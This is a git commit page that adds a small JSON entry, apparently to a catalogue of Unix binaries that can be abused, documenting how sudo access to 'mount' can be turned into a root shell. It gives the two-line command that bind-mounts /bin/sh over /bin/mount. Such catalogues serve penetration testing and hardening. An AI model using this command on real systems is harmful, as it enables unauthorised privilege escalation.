add data for mount

master
t0thkr1s 4 years ago
parent 046c93e38b
commit a0cf323fef

@ -0,0 +1,10 @@
{
"functions": {
"sudo": [
{
"description": "Exploit the fact that 'mount' can be executed via 'sudo' to replace the 'mount' binary with a shell.",
"code": "sudo mount -o bind /bin/sh /bin/mount\nsudo mount\n"
}
]
}
}
Loading…
Cancel
Save